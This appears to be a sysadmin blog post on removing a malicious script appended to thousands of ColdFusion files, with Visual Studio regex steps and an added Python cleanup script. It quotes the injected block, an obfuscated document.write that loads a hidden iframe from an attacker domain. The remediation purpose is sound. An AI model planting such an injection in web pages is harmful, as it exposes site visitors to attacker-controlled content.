Feb 14

Recently at work I was dealing with a server-wide compromise on a web server. A specific injection had been appended to over 2000 *.cfm files. Once permissions were in order (the root cause), I needed to figure out how to remove the injections. We have a very strong Storage Operations team and we make backups daily, but restores tend to scare customers. Since the injections were all appended and none of the legitimate data was overwritten, the injected block simply needed to be removed.

Open Visual Studio and press Ctrl+F. Switch the dialog from “Quick Replace” to “Replace in Files”.


The injection we want to remove for this example is as follows:

<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://www.maliciousdomain";
var applstrna2 = ".com/CONTENT/faq.htm";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>


Notice the multiple line breaks and special characters; this is where Visual Studio regular expressions become handy.

http://msdn.microsoft.com/en-us/library/2k3te2cs(VS.80).aspx

For this situation we need to understand how to use these expressions:

Any character    .     Matches any single character except a line break.
Zero or more     *     Matches zero or more occurrences of the preceding expression, making all possible matches.
Line break       \n    Matches a platform-independent line break. In a Replace expression, inserts a line break.
Escape           \     Matches the character that follows the backslash (\) as a literal. This allows you to find the characters used in regular expression notation, such as { and ^. For example, \^ searches for the ^ character.


Here is the final search string:

\<script\>\<\!\-\-\n.*\"\<if\"\;\n.*domain\"\;\n.*faq\.htm\"\;\n.*\=0\>\<\/i\"\;\n.*frame\>\"\;\n.*applstrna4\)\;\n.*\<\/script\>

Be sure to select “Use: Regular Expressions”, then “Replace all”. If you’re on an internal network you can just use a UNC path in the “Look in:” input.

When it completes, it reports how many occurrences were replaced and logs the result in the Find Results pane.

Replace all "\<script\>\<\!\-\-\n.*\"\<if\"\;\n.*domain\"\;\n .*faq\.htm\"\;\n.*\=0\>\<\/i\"\;\n.*frame\>\"\;\n.*applstrna4\)\;\n .*\<\/script\>", "", Regular expressions, Find Results 1, "C:\", "*.aspx" C:\Default.aspx(32,1): Total replaced: 1 Matching files: 1 Total files searched: 1
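The same cleanup can be scripted outside Visual Studio, which is useful when you want a dry run listing the affected files before anything is written, and a per-file backup when it is. The following is an added example, not code from the original post: it translates the Visual Studio search string above into a Python `re` pattern, walks a directory for *.cfm files, and strips the appended block. The `SAMPLE_INJECTION` text and the temporary-directory demo are constructed here for testing; the pattern assumes the injected block has exactly the eight-line shape shown above, so a variant with different line structure would not match and would show up as an unclean file rather than being silently altered.

```python
import re
import shutil
import tempfile
from pathlib import Path

# Constructed sample with the same shape as the injected block quoted above;
# embedded so the script can be run offline against a test file.
SAMPLE_INJECTION = (
    '<script><!--\n'
    'var applstrna0 = "<if";\n'
    'var applstrna1 = "rame src=http://www.maliciousdomain";\n'
    'var applstrna2 = ".com/CONTENT/faq.htm";\n'
    'var applstrna3 = " width=100 height=0></i";\n'
    'var applstrna4 = "frame>";\n'
    'document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);\n'
    '//--></script>'
)

# Python re translation of the Visual Studio search string from the post.
# Each injected line is matched as ".*" plus a literal tail, joined by line
# breaks; "\r?\n" accepts both CRLF (typical on a Windows host) and LF.
# "." does not cross line breaks, so a match can only span exactly these
# eight lines and cannot swallow legitimate markup around them.
INJECTION_RE = re.compile(
    r'<script><!--\r?\n'
    r'.*"<if";\r?\n'
    r'.*domain";\r?\n'
    r'.*faq\.htm";\r?\n'
    r'.*=0></i";\r?\n'
    r'.*frame>";\r?\n'
    r'.*applstrna4\);\r?\n'
    r'.*</script>'
)


def remove_injection(text):
    """Return (cleaned_text, number_of_blocks_removed)."""
    return INJECTION_RE.subn('', text)


def clean_tree(root, glob='*.cfm', dry_run=True):
    """Walk `root`, strip the injection from every matching file, and return
    {path: blocks_removed} for the files that contained it. With dry_run=True
    nothing is written, so the hit list can be reviewed first; otherwise a
    .bak copy is made beside each file before it is rewritten."""
    hits = {}
    for path in Path(root).rglob(glob):
        original = path.read_text(encoding='utf-8', errors='surrogateescape')
        cleaned, count = remove_injection(original)
        if count == 0:
            continue
        hits[str(path)] = count
        if not dry_run:
            shutil.copy2(path, path.with_suffix(path.suffix + '.bak'))
            path.write_text(cleaned, encoding='utf-8', errors='surrogateescape')
    return hits


if __name__ == '__main__':
    # Stand-alone demo on a temporary directory (constructed data).
    workdir = Path(tempfile.mkdtemp())
    (workdir / 'index.cfm').write_text('<html>legit</html>\n' + SAMPLE_INJECTION)
    (workdir / 'clean.cfm').write_text('<html>untouched</html>\n')
    print('dry run:', clean_tree(workdir))
    print('applied:', clean_tree(workdir, dry_run=False))
    print('after  :', repr((workdir / 'index.cfm').read_text()))
    shutil.rmtree(workdir)
```

Run it once with the default dry run to get the count of affected files, compare that against what the web server's file listing and the Find Results log from Visual Studio report, and only then run with `dry_run=False`. The `.bak` copies make the change reversible per file without involving a storage restore.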
